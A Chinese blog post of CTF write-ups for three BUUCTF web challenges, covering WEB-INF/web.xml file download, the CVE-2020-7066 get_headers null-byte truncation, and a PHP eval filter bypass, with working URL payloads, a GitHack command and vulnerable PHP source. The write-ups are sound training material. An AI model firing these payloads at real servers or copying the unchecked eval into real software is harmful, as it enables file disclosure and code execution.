BUUCTF 16

最新推荐文章于 2024-07-20 11:47:09 发布
最新推荐文章于 2024-07-20 11:47:09 发布
阅读量229 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52431855/article/details/113404789
版权

知识点

  • WEB-INF/web.xml泄露

  1. WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。WEB-INF主要包含一下文件或目录:        
  2.     /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。     
  3.     /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
  4.      /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
  5.     /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
  6.     /WEB-INF/database.properties:数据库配置文件

  • cve-2020-7066

  1. PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。
  2. 在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。

  • scandir()函数

  1. 语法:scandir(directory,sorting_order,context);
  2. 参数: 
  3. 作用:scandir() 函数返回指定目录中的文件和目录的数组。

  • localeconv()函数

  1. 语法:​​​​​​​localeconv()
  2. 定义和用法: 

  • current()函数​​​​​​​

  1. 语法:current(array)

  2. 参数:array 必需。规定要使用的数组。

定义和用法:

  • PHP array_reverse() 函数

  1. 语法:array_reverse(array,preserve)
  2. 参数: 
  3. 作用:

16-1  [RoarCTF 2019]Easy Java

做题思路

尝试一下登陆,看url也没什么特别

然后点开help,发现了 

却仍然没有思路

据WP得知,这种url一般是文件包含,可以下载文件下来,先抓包

然后改为 POST 请求试试  // 得到文件,打开为

由WP得到 Java 中WEB应用的安全目录 WEB-INF  分享一个关于源码泄露的网址,并且里面包含WEB-INF文件夹下面的web.xml的泄露

然后构造 payload 

?filename=WEB-INF/web.xml

发现 

尝试访问一下,

?filename=WEB-INF/classes/com/wm/ctf/FlagController.class

得到  发现一段base64字符,然后解密得到flag 

16-2  [GKCTF2020]cve版签到

做题思路

首先看到有个提示,点开之后

发现 cve-2020-7066,百度之后了解这是一个漏洞,具体使用如下

 点开链接

 并且在F12中 打开包发现了一个提示  

然后 又说了仅需要查看 ctfhub.com

于是构造 payload:/?url=http://127.0.0.1%00.ctfhub.com

 提示 host必须以123结尾

于是构造 payload:/?url=http://127.0.0.123%00.ctfhub.com

 

16-3 [GXYCTF2019]禁止套娃

做题思路

没发现什么的东西,好吧,毫无思路找WP

得知是 .git源码泄露

用GitHack拿到index.php

python GitHack.py http://f947babc-b762-4a48-bbe9-8fe7414d39a8.node3.buuoj.cn/.git/
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

然后得知了许多函数

构造payload得到目录

?exp=print_r(scandir(pos(localeconv())));

之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出
payload:

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));
小杌
关注
BUUCTF——Web
2201_75331136的博客
07-11 1017
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF-CRYPTO-[INSHack2017]rsa16m
zippo1234的博客
10-25 930
BUUCTF-MISC-[INSHack2017]rsa16m[INSHack2017]rsa16m题目分析开始1.题目:2.解题思路3.上脚本4.get flag结语 每天一题,只能多不能少 [INSHack2017]rsa16m 题目分析 n很大,c很大,相对而言e很小 开始 1.题目: 题目给了一个提示: # Challenge description: When you need really secure communications, you use RSA with a 4096 bit k
BUUCTF--web
zhhhb1005的博客
04-10 1552
目录 [极客大挑战 2019]EasySQL [极客大挑战 2019]Havefun [极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [极客大挑战 2019]EasySQL 打开题目发现需要输入用户名和密码,因为刚刚看了万能密码,所以可以尝试使用万能密码绕过,得出flag。 [极客大挑战 2019]Havefun 点击网页进去以后发现是一只小猫,没有任何线索,所以就可以考虑查看源代码,发现一段php语句,是一个简单的get传值。 .
BUUCTF——Web_buuctfweb
最新发布
2401_85236365的博客
07-20 944
得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.php,flag应该就在这个php文件中文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到flag猜测flag应该是在flag.php的源代码当中,我们可以利用php://filter伪协议来查看flag.php的源代码,构造payload: 成功获取到flag.php加密后到源代码内容:解密后得到flag为:启动靶机,出现以下界面尝试输入127.0.0.1后,出现以下界面,可以看到下方是有回显的由
BUUCTF-web
zhhhb1005的博客
04-24 2376
目录 [极客大挑战 2019]BuyFlag [极客大挑战 2019]BabySQL ​ [极客大挑战 2019]HardSQL [极客大挑战 2019]BuyFlag 打开网页,看一下源代码,发现有两个链接 不用管index.php,直接打开pay.php,出现提示 同时给出了购买flag的mone数量 查看cookie,发现user:0,将0改为1后页面发生变化 让我输入password,但是不知道密码是多少,所以看一下源代码,发现了一些东西 ...
BUUCTF BabyRSA
qq_63719504的博客
07-15 457
BUUCTF BabyRSA 。本题考察数学中的平方和和平方差以及进制转换和最基础的RSA加密得到密文m。先用int('0x',16)将16进制转换成10进制。可以用来对bytes对象的内容进行显示。
BUUCTF crackMe 题解
lifanxin的博客
07-12 3497
crackMe程序信息题目分析main函数分析sub_401830关键函数分析动态调试byte_416050求解总结 程序信息   这道题目来自于哪个实际比赛,我没有去找,我个人是从buuoj上刷到的,位于re部分第二页,题目只有一分,做出来的人也比较多,看起来应该是个简单的题目。   之所以要写这个wp,是对题目的答案存在一些疑问,网上也有很多wp,我都看了一下,大致都出自于同一个人的手笔O(∩_∩)O。我个人感觉网上的wp分析过程都漏了一步,虽然这样得出的flag可以通过buuoj,但是这是个crack
BUUCTF Reverse/rsa
ookami6497的博客
07-18 472
BUUCTF Reverse/rsa 下载得到两个文件 一开始我还以为这是个wireshark文件,还拿wireshark跑了好久 结果发现直接拿记事本打开就好 这个是加密过的密文 感觉这像是16进制转字符串转出来的乱码,用16进制转文本转换一下 得到密文c = 4167ea594a5e20a67db7879e53f795b13e7d5851c3f65ed3f7dc36c9a 转换为10进制得到 c = 11020875655672223346760684912302659
BUUCTF upload-labs
oJiuJieZhong的博客
10-11 3275
①这里是前端JS限制了我们只能上传特点格式的文件 ②这里我们可以在设置里面直接关闭网页的JS ③或者通过抓包的形式,绕过前端验证 ④这里在burp suite中将jpg改成php ⑤这里上传成功 ⑥我们也可以通过抓包的形式来了解文件上传的位置 ...
BUUCTF-WEB
ccfly1012的博客
11-02 3867
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF WEB
qq_43633585的博客
09-28 431
warmup 题目描述 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_.
BUUCTF web
qq_40026795的博客
06-20 281
一、打开靶机页面是一个滑稽图片,查看一下源代码,得到提示source.php 二、访问source.php可以看到高亮源码,搜索相应内容,是CVE-2018-12613 PhpMyadmin后台文件包含漏洞的简化版本 针对关键代码分析如下: (1)白名单验证,三次验证,任何一次通过即视为通过。 (2)第一次验证,在白名单里通过。这里可以看到hint.php也在白名单,访问得到提示ffffl...
buuctf web
gudugeji的博客
04-24 351
1.warmup 查看源码 2.随便注 堆叠注入 爆数据库 爆表,有两个表 构造playload:http://6d5326a4-99c2-423f-ab6f-46b44dc1853d.node3.buuoj.cn/?inject=1nject=1%27;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435...
BUUCTF WEB 1
weixin_45689999的博客
04-06 530
easy_sql 题目提示是简单sql注入,可以先试试过滤了什么 1’ or ‘1’=‘1# 1’ and 1=1# 没有报错,证明or,and和#都没有被过滤 2)爆字段数 1’order by 2# 1’order by 3#报错 3)爆库 1’ union select database()# 返回return preg_match("/select|update|delete|drop|...
BUUCTF web(一)
热门推荐
Lemon's blog
10-16 1万+
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题、MISC、密码学,多思考,提高一下自己做题的思路,以及代码审计、编写脚本的能力。 [HCTF 2018]WarmUp 查看源码,发现<!--source.php-->,打开发现源码 <?php highlight_file(__FILE__); if (! empty($_REQUEST['file...
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 在buuctf wireshark题目中,黑客通过使用Wireshark抓到了管理员登陆网站时的一段流量包,并将其中的密码作为flag。解题思路是使用Wireshark打开下载的文件,然后根据题目提示,在流量包中找到管理员登陆网站时的请求,该请求方式为POST类型,可以通过过滤条件 `http.request.method==POST` 来筛选出该请求。在该请求中,可以找到管理员的密码,作为flag提交。 不过,需要注意的是,获取到的flag需要加上 `flag{}` 并进行提交。 此外,根据中的提到的方法,您也可以直接将下载的图片文件扔到WinHex中进行查看,以便寻找是否存在flag。但是,请注意在buuctf wireshark题目中的具体解题思路仍然是通过Wireshark分析流量包。 总结起来,对于buuctf wireshark题目,您需要下载Wireshark软件,打开下载的文件,并根据题目提示找到管理员登陆网站时的流量包,从中获取管理员的密码作为flag,最后在提交flag时记得加上 `flag{}`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值